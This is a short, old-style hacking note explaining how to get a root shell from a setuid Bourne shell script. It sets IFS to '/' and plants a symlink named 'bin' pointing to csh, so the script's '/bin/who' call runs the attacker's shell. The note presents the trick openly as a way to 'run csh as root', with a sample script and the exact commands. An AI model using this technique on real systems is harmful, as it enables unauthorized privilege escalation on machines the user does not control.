For suid /bin/sh scripts

In the bourne shell you can set a variable called IFS (Internal Field
Seperators) to any characters that you want ignored in a filename.  For
example, lets say you had the suid shell script 'k':

------ k --------
#!/bin/sh

/bin/who -u
-----------------

Then you could make a link called 'bin' in your path to a shell of your
choosing:

% ln -s /bin/csh bin

Then:

% IFS=/

Then run 'k' and it will change the '/bin/who' to ' bin who' which
will run csh as root! :)